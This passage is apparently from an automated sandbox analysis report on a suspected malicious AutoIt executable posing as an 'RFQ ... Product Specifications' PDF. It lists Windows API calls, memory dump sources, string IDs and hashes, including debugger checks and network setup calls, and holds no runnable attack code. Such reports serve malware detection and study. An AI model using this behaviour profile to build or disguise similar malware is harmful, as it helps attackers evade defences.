                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A63B7C
                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00A63BA4
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A413C6,00000000,00000000,?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue), ref: 00A730A5
                                                                                                                • GetLastError.KERNEL32(?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue,00AE2290,FlsSetValue,00000000,00000364,?,00A72E46), ref: 00A730B1
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A7301A,00A413C6,00000000,00000000,00000000,?,00A7328B,00000006,FlsSetValue,00AE2290,FlsSetValue,00000000), ref: 00A730BF
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00AA747F
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AA7497
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AA74AC
                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AA74CA
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0C4
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0E9
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB0F3
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AAACD3,?,00008000), ref: 00AAB126
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AA2DC5
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA2DD6
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AA2DDD
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AA2DE4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                  • Part of subcall function 00A59639: BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AD8887
                                                                                                                • LineTo.GDI32(?,?,?), ref: 00AD8894
                                                                                                                • EndPath.GDI32(?), ref: 00AD88A4
                                                                                                                • StrokePath.GDI32(?), ref: 00AD88B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00A598CC
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A598D6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A598E9
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A598F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Color$ModeObjectStockText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4037423528-0
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AA1634
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AA11D9), ref: 00AA163B
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AA11D9), ref: 00AA1648
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AA11D9), ref: 00AA164F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00A9D858
                                                                                                                • GetDC.USER32(00000000), ref: 00A9D862
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9D882
                                                                                                                • ReleaseDC.USER32(?), ref: 00A9D8A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00A9D86C
                                                                                                                • GetDC.USER32(00000000), ref: 00A9D876
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9D882
                                                                                                                • ReleaseDC.USER32(?), ref: 00A9D8A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AB4ED4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Connection_wcslen
                                                                                                                • String ID: *$LPT
                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #
                                                                                                                • API String ID: 0-1885708031
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A5F2A2
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A5F2BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: f260e1ee4e0cebf051bdfe72b4de1c81bc0d3a6417b79ad66290c26a978f6e95
                                                                                                                • Instruction ID: 44bc672d3953551b8d969e2a3542fdf672962df08e20e09438b6cb0737acc2d5
                                                                                                                • Opcode Fuzzy Hash: f260e1ee4e0cebf051bdfe72b4de1c81bc0d3a6417b79ad66290c26a978f6e95
                                                                                                                • Instruction Fuzzy Hash: DD5143724097849BD320EF90D986BAFBBF8FBC4310F81885DF1D9411A5EB718529CB66
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00AC57E0
                                                                                                                • _wcslen.LIBCMT ref: 00AC57EC
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper_wcslen
                                                                                                                • String ID: CALLARGARRAY
                                                                                                                • API String ID: 157775604-1150593374
                                                                                                                • Opcode ID: 12eb2c7099eceac3229beb62517dd6259b66afdd9444fb09d1a041444125e98f
                                                                                                                • Instruction ID: 151ebc4d157e9010f29e6273753c76b8a4d7c44046548d9938fffd9347cf0787
                                                                                                                • Opcode Fuzzy Hash: 12eb2c7099eceac3229beb62517dd6259b66afdd9444fb09d1a041444125e98f
                                                                                                                • Instruction Fuzzy Hash: 9E416A31E002099FCB14DFB8C981EAEBBB5EF59360B55406DF505A7291E730AD81DBA0
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00ABD130
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ABD13A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                • String ID: |
                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                • Opcode ID: 75ae40be4c9bd76fa93508f48edd9316b55037d0db2dc24a91589e3e57c535b1
                                                                                                                • Instruction ID: 5cac73cecb235479203b8e34d5f60e8347ea3083eeaa5fd945e5012564e62a45
                                                                                                                • Opcode Fuzzy Hash: 75ae40be4c9bd76fa93508f48edd9316b55037d0db2dc24a91589e3e57c535b1
                                                                                                                • Instruction Fuzzy Hash: 1C315C75D00209ABCF15EFA4DD85AEEBFB9FF49300F000019F815A6162EB31AA06CB60
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00AD3621
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AD365C
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 8280c64c84e7df8c28c4de0f61427e3aa36ec0b6adb3c4159eb02e50be559dfe
                                                                                                                • Instruction ID: 111896f4fd008eb81af6a8ec493f48188208dc8b3d26000eb9ad24be8fc2a581
                                                                                                                • Opcode Fuzzy Hash: 8280c64c84e7df8c28c4de0f61427e3aa36ec0b6adb3c4159eb02e50be559dfe
                                                                                                                • Instruction Fuzzy Hash: 21319C72110604AEDB10DF68DC81EFB73A9FF88720F00961AF9A697280DB35ED81D761
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00AD461F
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AD4634
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: ebc0b89307b2d066ce430e4cf1d4268e3021f7672acd193b5ed7110d7729cc96
                                                                                                                • Instruction ID: 4bd5e213e26cdfa0a134c1a42b3cf053f95ba962104bc8f06548bf226b657479
                                                                                                                • Opcode Fuzzy Hash: ebc0b89307b2d066ce430e4cf1d4268e3021f7672acd193b5ed7110d7729cc96
                                                                                                                • Instruction Fuzzy Hash: 3E310574A0130A9FDB14CFA9D991BDABBB5FF49300F14406AE906AB391E770E941CF90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AD327C
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD3287
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: f3c178f4b1c4f4a2129232f217fb6414f2205fdf9baaf77284073b2222599d43
                                                                                                                • Instruction ID: 47ac489a47a80d9dd8226308ed6e9508b0d7cd751240c63da8cac996b4e08ca3
                                                                                                                • Opcode Fuzzy Hash: f3c178f4b1c4f4a2129232f217fb6414f2205fdf9baaf77284073b2222599d43
                                                                                                                • Instruction Fuzzy Hash: 9811E272B002087FEF219F94DC80EFB3B6AEBA4364F10412AF91A97390D6719D518760
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A4600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                  • Part of subcall function 00A4600E: GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                  • Part of subcall function 00A4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AD377A
                                                                                                                • GetSysColor.USER32(00000012), ref: 00AD3794
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 8d328fb7c7982a42415372a92c1f86ec4b69b5731c4c8e3594d564fc8db49fc8
                                                                                                                • Instruction ID: d37c17cd23fef5400d39731f6fd94775302b238cc1dcc22dd89376a87383e80d
                                                                                                                • Opcode Fuzzy Hash: 8d328fb7c7982a42415372a92c1f86ec4b69b5731c4c8e3594d564fc8db49fc8
                                                                                                                • Instruction Fuzzy Hash: E61129B261060AAFDF00DFA8CC46AEA7BB8FB08354F004916F956E3250D735E951DB60
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ABCD7D
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ABCDA6
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 4371f115b5cf3c287a1e8a95a445c4b3791a6408265d7681801a5d780944cccc
                                                                                                                • Instruction ID: dbf9ed41286e81de90151ae17ed62da07d7fc4fefcca22b8b4039319ba3d3229
                                                                                                                • Opcode Fuzzy Hash: 4371f115b5cf3c287a1e8a95a445c4b3791a6408265d7681801a5d780944cccc
                                                                                                                • Instruction Fuzzy Hash: 2311C279205632BAD7384B668C49EE7BFACEF527B4F40422AB14983092D7749941D6F0
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00AD34AB
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AD34BA
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: ef42ae1587cdce81f7d9f9ffa6b7e4f8889b31faa1a02db05d49a8b28a3bcbd7
                                                                                                                • Instruction ID: abff6e0994cfa51fa2e784cb680e245836a3a1da616b6712d366279154b53f96
                                                                                                                • Opcode Fuzzy Hash: ef42ae1587cdce81f7d9f9ffa6b7e4f8889b31faa1a02db05d49a8b28a3bcbd7
                                                                                                                • Instruction Fuzzy Hash: CF11BFB2100108AFEF118F64EC40AFB376AEB05775F508726F962932D0C779DD519752
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00AA6CB6
                                                                                                                • _wcslen.LIBCMT ref: 00AA6CC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: STOP
                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                • Opcode ID: 0eef5e11c41d721ee508e27b5494e2d66027082828a4cdb66d1c209b06c1e678
                                                                                                                • Instruction ID: 9e6fa9fe745df65d847e78ff5883d3bff93f5a5699962a26cc4e5e494279ef8c
                                                                                                                • Opcode Fuzzy Hash: 0eef5e11c41d721ee508e27b5494e2d66027082828a4cdb66d1c209b06c1e678
                                                                                                                • Instruction Fuzzy Hash: 020126326009278BCB209FFDDD808BF37B4EFA67607050524E862931D5EB31D900CA50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AA1D4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 6f3b394fee60cb482ac7e9793284c2ce0d9db0ebcbd97fdaec61a1c7d7fd9b0a
                                                                                                                • Instruction ID: 39bf40f123895c925ca639b69465d7eeb2ddd954ca2abb71d672ab987ace3234
                                                                                                                • Opcode Fuzzy Hash: 6f3b394fee60cb482ac7e9793284c2ce0d9db0ebcbd97fdaec61a1c7d7fd9b0a
                                                                                                                • Instruction Fuzzy Hash: D701D879641218BBCF14EFA4CD55CFFB7A8EB47360F440619F832572D1EB3059188660
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AA1C46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: d24f5d9dc11caf6a8c5453ec4b42a5b1a86f35d81194c0b2b9b47c643a1b4422
                                                                                                                • Instruction ID: 388266bd6a381fbbe4798715d722b289a53ba3a5ed10d88e0f82481b247f7ea5
                                                                                                                • Opcode Fuzzy Hash: d24f5d9dc11caf6a8c5453ec4b42a5b1a86f35d81194c0b2b9b47c643a1b4422
                                                                                                                • Instruction Fuzzy Hash: A601A775AC11087ACF14EF90CE519FF77A89B52360F140019B406672C2EB249E1CC6B1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AA1CC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 3f92868587bf09f85a23c3dce3132ecdb3683ffdef76e2ff28fea3c42ecd7292
                                                                                                                • Instruction ID: d36edd79c5fd49ab1388be96aa4607aebaa8288364c858c18266ada4c93e058e
                                                                                                                • Opcode Fuzzy Hash: 3f92868587bf09f85a23c3dce3132ecdb3683ffdef76e2ff28fea3c42ecd7292
                                                                                                                • Instruction Fuzzy Hash: EC01A275A811187ACF14EFA4CB41AFF77A89B12350F140416B802732C2EB219F29C6B2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00AA1DD3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 987abe70a503b2008032ccb10465db250f7f07bdaec65f4ea14ff2caebabbf40
                                                                                                                • Instruction ID: 085a0c18ee2cbf9615b4ee5bcb4b3ad6157d7509757c9eb2fdd0a4c3897ecf57
                                                                                                                • Opcode Fuzzy Hash: 987abe70a503b2008032ccb10465db250f7f07bdaec65f4ea14ff2caebabbf40
                                                                                                                • Instruction Fuzzy Hash: 93F0C875B412187ADB14FBA4CE92FFF77B8AB43350F040915B822632C2DB60991C86A1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: 3, 3, 16, 1
                                                                                                                • API String ID: 176396367-3042988571
                                                                                                                • Opcode ID: 18e92c73fdff428b4a702b2df5b090c0e9361e9d5be1d6a3609a7c8c650a2249
                                                                                                                • Instruction ID: d889d8976f8454d616d5b6e5f00ae202dce7cdc48c8b340e8643cdecd75ae3d9
                                                                                                                • Opcode Fuzzy Hash: 18e92c73fdff428b4a702b2df5b090c0e9361e9d5be1d6a3609a7c8c650a2249
                                                                                                                • Instruction Fuzzy Hash: 71E02B0365462010A23513799FC1F7F569ADFC9750711182FF981C2266EA948D9293A0
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AA0B23
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                • Opcode ID: 967a99d7508e4be21882f87468eb6b067dbea69fb2edabc424acbe6fa8b5a947
                                                                                                                • Instruction ID: 4e225c76862674507c45959a9fbde9f33a4afae8cd4cba5f74de8feedfb44e4a
                                                                                                                • Opcode Fuzzy Hash: 967a99d7508e4be21882f87468eb6b067dbea69fb2edabc424acbe6fa8b5a947
                                                                                                                • Instruction Fuzzy Hash: 82E0D8322443093AD2143794BD03FC97B949F05B21F50042BFB49955C38AF2245086A9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A5F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A60D71,?,?,?,00A4100A), ref: 00A5F7CE
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00A4100A), ref: 00A60D75
                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A4100A), ref: 00A60D84
                                                                                                                Strings
                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A60D7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
